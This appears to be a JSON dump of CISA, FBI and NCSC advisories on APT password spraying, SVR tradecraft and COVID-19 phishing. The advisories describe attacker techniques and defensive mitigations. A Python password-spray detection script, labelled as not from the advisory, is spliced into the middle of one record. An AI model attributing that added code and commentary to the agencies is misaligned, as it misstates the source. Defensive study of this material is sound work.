access other accounts where the credentials are reused. Additionally, the actor could attempt to move laterally across the network to steal additional data and implement further attacks against other accounts within the network.\n\nIn previous incidents investigated by CISA and NCSC, malicious cyber actors used password spraying to compromise email accounts in an organization and then, in turn, used these accounts to download the victim organization\u2019s Global Address List (GAL). 
The actors then used the GAL to password spray further accounts.\n\nNCSC has previously provided [examples of frequently found passwords](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>), which attackers are known to use in password spray attacks to attempt to gain access to corporate accounts and networks. In these attacks, malicious cyber actors often use passwords based on the month of the year, seasons, and the name of the company or organization.\n\nCISA and NCSC continue to investigate activity linked to large-scale password spraying campaigns. APT actors will continue to exploit COVID-19 as they seek to answer additional intelligence questions relating to the pandemic. CISA and NCSC advise organizations to follow the mitigation advice below in view of this heightened activity.\n\n### Mitigations\n\nCISA and NCSC have previously published information for organizations on password spraying and improving password policy. Putting this into practice will significantly reduce the chance of compromise from this kind of attack.\n\n * [CISA alert on password spraying attacks](<https://www.us-cert.gov/ncas/alerts/TA18-086A>)\n * [CISA guidance on choosing and protecting passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>)\n * [CISA guidance on supplementing passwords](<https://www.us-cert.gov/ncas/tips/ST05-012>)\n * [NCSC guidance on password spraying attacks](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>)\n * [NCSC guidance on password administration for system owners](<https://www.ncsc.gov.uk/collection/passwords>)\n * [NCSC guidance on password deny lists](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>)\n\nCISA\u2019s [Cyber Essentials](<https://www.cisa.gov/sites/default/files/publications/19_1106_cisa_CISA_Cyber_Essentials_S508C_0.pdf>) for small organizations provides guiding principles for leaders to develop a culture of security and specific actions for IT 
professionals to put that culture into action. Additionally, the UK government\u2019s [Cyber Aware](<https://www.ncsc.gov.uk/cyberaware/home>) campaign provides useful advice for individuals on how to stay secure online during the coronavirus pandemic. This includes advice on protecting passwords, accounts, and devices.\n\nA number of other mitigations will be of use in defending against the campaigns detailed in this report:\n\n * **Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and configurations.** See CISA\u2019s [guidance on enterprise VPN security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>) and NCSC [guidance on virtual private networks](<https://www.ncsc.gov.uk/collection/mobile-device-guidance/virtual-private-networks>) for more information.\n * **Use multi-factor authentication to reduce the impact of password compromises.** See the U.S. National Cybersecurity Awareness Month\u2019s [how-to guide for multi-factor authentication](<https://niccs.us-cert.gov/sites/default/files/documents/pdf/ncsam_howtoguidemfa_508.pdf?trackDocs=ncsam_howtoguidemfa_508.pdf>). Also see NCSC guidance on [multi-factor authentication services](<https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services>) and [setting up two-factor authentication](<https://www.ncsc.gov.uk/guidance/setting-two-factor-authentication-2fa>).\n * **Protect the management interfaces of your critical operational systems.** In particular, use browse-down architecture to prevent attackers from easily gaining privileged access to your most vital assets. See [the NCSC blog on protecting management interfaces](<https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces>).\n * **Set up a security monitoring capability** so you are collecting the data that will be needed to analyze network intrusions. 
See the [NCSC introduction to logging for security purposes](<https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes>).\n * **Review and refresh your incident management processes.** See [the NCSC guidance on incident management](<https://www.ncsc.gov.uk/guidance/10-steps-incident-management>).\n * **Use modern systems and software.** These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See [the NCSC guidance on obsolete platform security](<https://www.ncsc.gov.uk/guidance/obsolete-platforms-security>).\n * **Further information:** Invest in preventing malware-based attacks across various scenarios. See CISA\u2019s guidance on [ransomware](<https://www.us-cert.gov/Ransomware>) and [protecting against malicious code](<https://www.us-cert.gov/ncas/tips/ST18-271>). Also see [the NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>).\n\n### Contact Information\n\nCISA encourages U.S. users and organizations to contribute any additional information that may relate to this threat by emailing [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" ).\n\nThe NCSC encourages UK organizations to report any suspicious activity to the NCSC via their website: <https://report.ncsc.gov.uk/>.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[2] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[3] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[4] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### Revisions\n\nMay 5, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-25T12:00:00", "type": "ics", "title": "APT Groups Target Healthcare and Essential Services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-01-25T12:00:00", "id": "AA20-126A", "href": 
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-126a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:15:09", "description": "### Summary\n\nThe Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors\u2014also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium\u2014will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled \u201cRussian SVR Targets U.S. and Allied Networks,\u201d released on April 15, 2021.\n\nThe FBI and DHS are providing information on the SVR\u2019s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.\n\nClick here for a PDF version of this report.\n\n### Threat Overview\n\nSVR cyber operations have posed a longstanding threat to the United States. 
Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors\u2019 ability to move within victim environments undetected.\n\nBeginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.\n\n### Technical Details\n\n### SVR Cyber Operations Tactics, Techniques, and Procedures\n\n### Password Spraying\n\nIn one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a \u201clow and slow\u201d manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.\n\nThe organization unintentionally exempted the compromised administrator\u2019s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.\n\nThe actors also used the misconfiguration for compromised non-administrative accounts. 
That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple\u2019s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.\n\nWhile the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.\n\nDuring the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. 
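The spray described in this incident, and in the Technical Details of the joint CISA-NCSC alert above, is the case a per-source-IP rule misses: the guesses are spread over many in-country residential, mobile, VPS and Tor addresses so that no one address ever fails against many accounts, and the follow-on access comes from a single leased VPS through a client that only speaks legacy single-factor authentication. The following is an added example and is not code from this advisory or from the FBI or CISA. It runs three checks over a constructed sign-in log: a conventional per-IP rule, a tenant-wide rule that counts accounts rather than sources, and two follow-on checks for successes on sprayed accounts from previously unseen addresses and for successes through legacy mail clients. The event shape, the thresholds, the IP addresses, the account names and the legacy user-agent markers are all assumptions; map them onto whatever your identity provider or mail server actually logs.

```python
"""Password-spray triage over a constructed sign-in log.

Added example, not code from the CISA/FBI advisory. Event shape, thresholds,
addresses and user-agent markers are assumptions; adapt them to your own
IdP or mail-server logs.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

BROWSER = "Mozilla/5.0 (Windows NT 10.0) Edge/85.0"
ACCOUNTS = ["alice", "bob", "carol", "dave", "erin", "frank",
            "grace", "heidi", "ivan", "judy", "mallory", "svc-admin"]


def build_sample_events():
    """Constructed data (not real logs): nine spray sources over three days,
    each trying one guess against four accounts, so no account sees more than
    three failures and no single IP touches more than four accounts."""
    events = [("2018-05-30T08:00:00", "carol", "10.0.0.7", "SUCCESS", BROWSER)]
    for day in range(3):
        for i in range(3):
            ip = f"203.0.113.{day * 3 + i + 1}"
            for j, acct in enumerate(ACCOUNTS):
                if (j + i + day) % 3 == 0:
                    ts = datetime(2018, 6, 1 + day, 1 + 6 * i) + timedelta(minutes=7 * j)
                    events.append((ts.isoformat(), acct, ip, "FAIL", BROWSER))
    events += [
        # follow-on access, one leased VPS per account, via legacy mail clients
        ("2018-06-04T02:15:00", "svc-admin", "192.0.2.50", "SUCCESS",
         "Apple-Mail/3445.104.11"),
        ("2018-06-04T03:40:00", "bob", "192.0.2.51", "SUCCESS",
         "Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7015; Pro)"),
        # benign: carol signs in from the address she used before the spray
        ("2018-06-04T08:00:00", "carol", "10.0.0.7", "SUCCESS", BROWSER),
    ]
    return sorted(events)  # ISO-8601 strings sort chronologically


def parse(raw):
    return [{"ts": datetime.fromisoformat(t), "account": a, "ip": ip,
             "result": r, "ua": ua} for t, a, ip, r, ua in raw]


def spray_sources(events, window=timedelta(hours=24), min_accounts=10):
    """Conventional per-source rule: one IP failing against many accounts
    inside the window. Returns {ip: distinct_accounts} for sources over threshold."""
    by_ip = defaultdict(list)
    for e in events:
        if e["result"] == "FAIL":
            by_ip[e["ip"]].append(e)
    hits = {}
    for ip, evs in by_ip.items():
        for start in evs:
            accts = {e["account"] for e in evs
                     if start["ts"] <= e["ts"] < start["ts"] + window}
            if len(accts) >= min_accounts:
                hits[ip] = max(len(accts), hits.get(ip, 0))
    return hits


def spray_campaign(events, window=timedelta(hours=72),
                   min_accounts=10, max_per_account=3):
    """Tenant-wide rule: many distinct accounts each failing only a few times
    inside one window, regardless of source IP. Returns (accounts, window_start)."""
    fails = sorted((e for e in events if e["result"] == "FAIL"), key=lambda e: e["ts"])
    best, best_start = [], None
    for start in fails:
        per_acct = Counter(e["account"] for e in fails
                           if start["ts"] <= e["ts"] < start["ts"] + window)
        low = sorted(a for a, n in per_acct.items() if n <= max_per_account)
        if len(low) >= min_accounts and len(low) > len(best):
            best, best_start = low, start["ts"]
    return best, best_start


def success_after_spray(events, sprayed, since):
    """Successes on sprayed accounts from an IP that account never used before
    the spray began: the candidates for compromise."""
    if since is None:
        return []
    known = defaultdict(set)
    for e in events:
        if e["result"] == "SUCCESS" and e["ts"] < since:
            known[e["account"]].add(e["ip"])
    return [(e["account"], e["ip"]) for e in events
            if e["result"] == "SUCCESS" and e["ts"] >= since
            and e["account"] in sprayed and e["ip"] not in known[e["account"]]]


# Assumed markers for clients that only speak legacy single-factor auth;
# tune against the user-agent strings your own logs record.
LEGACY_CLIENT_MARKERS = ("Apple-Mail", "Microsoft Office/14",
                         "Microsoft Office/15", "BAV2ROPC")


def legacy_client_logins(events):
    return [(e["account"], e["ip"]) for e in events
            if e["result"] == "SUCCESS"
            and any(m in e["ua"] for m in LEGACY_CLIENT_MARKERS)]


def triage(raw=None):
    events = parse(raw if raw is not None else build_sample_events())
    sprayed, since = spray_campaign(events)
    return {"per_ip_hits": spray_sources(events),
            "sprayed_accounts": sprayed,
            "compromised": success_after_spray(events, set(sprayed), since),
            "legacy_logins": legacy_client_logins(events)}


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

On the constructed data the per-IP rule returns nothing, because every source touches only four accounts, while the tenant-wide rule flags all twelve accounts and the two follow-on checks both single out the svc-admin and bob sign-ins. The account-count rule is the one to alert on; the legacy-client check is a reason to block legacy authentication outright rather than to hunt for it after the fact, and the "new IP for a sprayed account" check is what turns a noisy spray alert into a short list of accounts to reset.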
\n\n#### _**Recommendations**_\n\nTo defend against this technique, the FBI and DHS recommend network operators follow best practices for configuring access to cloud computing environments, including:\n\n * Mandatory use of an approved multi-factor authentication solution for all users from both on-premises and remote locations.\n * Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.\n * Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.\n * Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.\n * Regularly review the organization\u2019s password management program.\n * Ensure the organization\u2019s information technology (IT) support team has well-documented standard operating procedures for password resets and user account lockouts.\n * Maintain a regular cadence of security awareness training for all company employees.\n\n### Leveraging Zero-Day Vulnerability\n\nIn a separate incident, SVR actors used CVE-2019-19781, a zero-day vulnerability at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.\n\nThe actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.\n\nFollowing initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. 
Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably so that their network traffic would blend in with normal activity.\n\n#### **_Recommendations_**\n\nTo defend against this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:\n\n * Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as Nmap.\n * Ensure host-based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.\n * Require use of multi-factor authentication to access internal systems.\n * Immediately configure systems newly added to the network, including those used for testing or development work, to follow the organization\u2019s security baseline and incorporate them into enterprise monitoring tools.\n\n### WELLMESS Malware\n\nIn 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI\u2019s investigation revealed that following initial compromise of a network\u2014normally through an unpatched, publicly known vulnerability\u2014the actors deployed WELLMESS. Once on the network, the actors targeted each organization\u2019s vaccine research repository and Active Directory servers. 
These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion has been previously released and is referenced in the \u2018Resources\u2019 section of this document.\n\n### Tradecraft Similarities of SolarWinds-enabled Intrusions\n\nDuring the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR\u2019s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR\u2019s historic tradecraft.\n\nThe FBI\u2019s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.\n\n#### **_Recommendations_**\n\nAlthough defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. 
This was achieved using a variety of monitoring techniques, including:\n\n * Auditing log files to identify attempts to access privileged certificates and creation of fake identity providers.\n * Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.\n * Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.\n * Using available public resources to identify credential abuse within cloud environments.\n * Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.\n\nWhile few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly \u201czero trust\u201d architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.\n\n### General Tradecraft Observations\n\nSVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low-reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. 
While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.\n\nThe FBI also notes SVR cyber operators have used open-source or commercially available tools continuously, including Mimikatz\u2014an open-source credential-dumping tool\u2014and Cobalt Strike\u2014a commercially available exploitation tool.\n\n### Mitigations\n\nThe FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.\n\n### Resources\n\n * NSA, CISA, FBI [Joint Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n * CISA: [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * CISA [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * FBI, CISA, ODNI, NSA Joint Statement: [Joint Statement by the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence (ODNI), and the National Security Agency](<https://www.odni.gov/index.php/newsroom/press-releases/press-releases-2021/item/2176-joint-statement-by-the-federal-bureau-of-investigation-fbi-the-cybersecurity-and-infrastructure-security-agency-cisa-the-office-of-the-director-of-national-intelligence-odni-and-the-national-security-agency-nsa>)\n * CISA Alert [AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [CISA Insights: What Every Leader Needs to Know about the Ongoing APT Cyber Activity](<https://www.cisa.gov/sites/default/files/publications/CISA Insights - What Every Leader 
Needs to Know About the Ongoing APT Cyber Activity - FINAL_508.pdf>)\n * FBI, CISA [Joint Cybersecurity Advisory: Advanced Persistent Threat Actors Targeting U.S. Think Tanks](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf>)\n * CISA: [Malicious Activity Targeting COVID-19 Research, Vaccine Development ](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/16/malicious-activity-targeting-covid-19-research-vaccine-development>)\n * NCSC, CSE, NSA, CISA Advisory: [APT 29 targets COVID-19 vaccine development](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n### Revisions\n\nApril 26, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T12:00:00", "type": "ics", "title": "Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-04-26T12:00:00", "id": "AA21-116A", "href": 
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-116a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:44:44", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nThis alert provides information on exploitation by cybercriminal and advanced persistent threat (APT) groups of the current coronavirus disease 2019 (COVID-19) global pandemic. It includes a non-exhaustive list of indicators of compromise (IOCs) for detection as well as mitigation advice.\n\nBoth CISA and NCSC are seeing a growing use of COVID-19-related themes by malicious cyber actors. At the same time, the surge in teleworking has increased the use of potentially vulnerable services, such as virtual private networks (VPNs), amplifying the threat to individuals and organizations.\n\nAPT groups and cybercriminals are targeting individuals, small and medium enterprises, and large organizations with COVID-19-related scams and phishing emails. This alert provides an overview of COVID-19-related malicious cyber activity and offers practical advice that individuals and organizations can follow to reduce the risk of being impacted. The IOCs provided within the accompanying .csv and .stix files of this alert are based on analysis from CISA, NCSC, and industry.\n\n**Note:** This is a fast-moving situation and this alert does not seek to catalogue all COVID-19-related malicious cyber activity. Individuals and organizations should remain alert to increased activity relating to COVID-19 and take proactive steps to protect themselves.\n\n### Technical Details\n\n## Summary of Attacks\n\nAPT groups are using the COVID-19 pandemic as part of their cyber operations. These cyber threat actors will often masquerade as trusted entities. 
Their activity includes using coronavirus-themed phishing messages or malicious applications, often masquerading as trusted entities that may have been previously compromised. Their goals and targets are consistent with long-standing priorities such as espionage and \u201chack-and-leak\u201d operations.\n\nCybercriminals are using the pandemic for commercial gain, deploying a variety of ransomware and other malware.\n\nBoth APT groups and cybercriminals are likely to continue to exploit the COVID-19 pandemic over the coming weeks and months. Threats observed include:\n\n * Phishing, using the subject of coronavirus or COVID-19 as a lure,\n * Malware distribution, using coronavirus- or COVID-19-themed lures,\n * Registration of new domain names containing wording related to coronavirus or COVID-19, and\n * Attacks against newly\u2014and often rapidly\u2014deployed remote access and teleworking infrastructure.\n\nMalicious cyber actors rely on basic social engineering methods to entice a user to carry out a specific action. These actors are taking advantage of human traits such as curiosity and concern around the coronavirus pandemic in order to persuade potential victims to:\n\n * Click on a link or download an app that may lead to a phishing website, or the downloading of malware, including ransomware. \n * For example, a malicious Android app purports to provide a real-time coronavirus outbreak tracker but instead attempts to trick the user into providing administrative access to install \"CovidLock\" ransomware on their device.[[1]](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n * Open a file (such as an email attachment) that contains malware. 
\n * For example, email subject lines contain COVID-19-related phrases such as \u201cCoronavirus Update\u201d or \u201c2019-nCov: Coronavirus outbreak in your city (Emergency).\u201d\n\nTo create the impression of authenticity, malicious cyber actors may spoof sender information in an email to make it appear to come from a trustworthy source, such as the World Health Organization (WHO) or an individual with \u201cDr.\u201d in their title. In several examples, actors send phishing emails that contain links to a fake email login page. Other emails purport to be from an organization\u2019s human resources (HR) department and advise the employee to open the attachment.\n\nMalicious file attachments containing malware payloads may be named with coronavirus- or COVID-19-related themes, such as \u201cPresident discusses budget savings due to coronavirus with Cabinet.rtf.\u201d\n\n**Note:** A non-exhaustive list of IOCs related to this activity is provided within the accompanying .csv and .stix files of this alert.\n\n## Phishing\n\nCISA and NCSC have both observed a large volume of phishing campaigns that use the social engineering techniques described above.\n\nExamples of phishing email subject lines include:\n\n * 2020 Coronavirus Updates,\n * Coronavirus Updates,\n * 2019-nCov: New confirmed cases in your City, and\n * 2019-nCov: Coronavirus outbreak in your city (Emergency).\n\nThese emails contain a call to action, encouraging the victim to visit a website that malicious cyber actors use for stealing valuable data, such as usernames and passwords, credit card information, and other personal information.\n\n## SMS Phishing\n\nMost phishing attempts come by email, but NCSC has observed some attempts to carry out phishing by other means, including text messages (SMS).\n\nHistorically, SMS phishing has often used financial incentives\u2014including government payments and rebates (such as a tax rebate)\u2014as part of the lure. 
Coronavirus-related phishing continues this financial theme, particularly in light of the economic impact of the epidemic and governments\u2019 employment and financial support packages. For example, a series of SMS messages uses a UK government-themed lure to harvest email, address, name, and banking information. These SMS messages\u2014purporting to be from \u201cCOVID\u201d and \u201cUKGOV\u201d (see figure 1)\u2014include a link directly to the phishing site (see figure 2).\n\n\n\n##### Figure 1: UK government-themed SMS phishing\n\n\n\n##### Figure 2: UK government-themed phishing page\n\nAs this example demonstrates, malicious messages can arrive by methods other than email. In addition to SMS, possible channels include WhatsApp and other messaging services. Malicious cyber actors are likely to continue using financial themes in their phishing campaigns. Specifically, it is likely that they will use new government aid packages responding to COVID-19 as themes in phishing campaigns.\n\n## Phishing for credential theft\n\nA number of actors have used COVID-19-related phishing to steal user credentials. These emails include previously mentioned COVID-19 social engineering techniques, sometimes complemented with urgent language to enhance the lure.\n\nIf the user clicks on the hyperlink, a spoofed login webpage appears that includes a password entry form. These spoofed login pages may relate to a wide array of online services including\u2014but not limited to\u2014email services provided by Google or Microsoft, or services accessed via government websites.\n\nTo further entice the recipient, the websites will often contain COVID-19-related wording within the URL (e.g., \u201ccorona-virus-business-update,\u201d \u201ccovid19-advisory,\u201d or \u201ccov19esupport\u201d). These spoofed pages are designed to look legitimate or accurately impersonate well-known websites. Often the only way to notice malicious intent is through examining the website URL. 
In some circumstances, malicious cyber actors specifically customize these spoofed login webpages for the intended victim.\n\nIf the victim enters their password on the spoofed page, the attackers will be able to access the victim\u2019s online accounts, such as their email inbox. This access can then be used to acquire personal or sensitive information, or to further disseminate phishing emails, using the victim\u2019s address book.\n\n## Phishing for malware deployment\n\nA number of threat actors have used COVID-19-related lures to deploy malware. In most cases, actors craft an email that persuades the victim to open an attachment or download a malicious file from a linked website. When the victim opens the attachment, the malware is executed, compromising the victim\u2019s device.\n\nFor example, NCSC has observed various email messages that deploy the \u201cAgent Tesla\u201d keylogger malware. The email appears to be sent from Dr. Tedros Adhanom Ghebreyesus, Director-General of WHO. This email campaign began on Thursday, March 19, 2020. Another similar campaign offers thermometers and face masks to fight the epidemic. The email purports to attach images of these medical products but instead contains a loader for Agent Tesla.\n\nIn other campaigns, emails include a Microsoft Excel attachment (e.g., \u201c8651 8-14-18.xls\u201d) or contain URLs linking to a landing page that contains a button that\u2014if clicked\u2014redirects to download an Excel spreadsheet, such as \"EMR Letter.xls\u201d. In both cases, the Excel file contains macros that, if enabled, execute an embedded dynamic-link library (DLL) to install the \u201cGet2 loader\" malware. Get2 loader has been observed loading the \u201cGraceWire\u201d Trojan.\n\nThe \"TrickBot\" malware has been used in a variety of COVID-19-related campaigns. In one example, emails target Italian users with a document purporting to be information related to COVID-19 (see figure 3). 
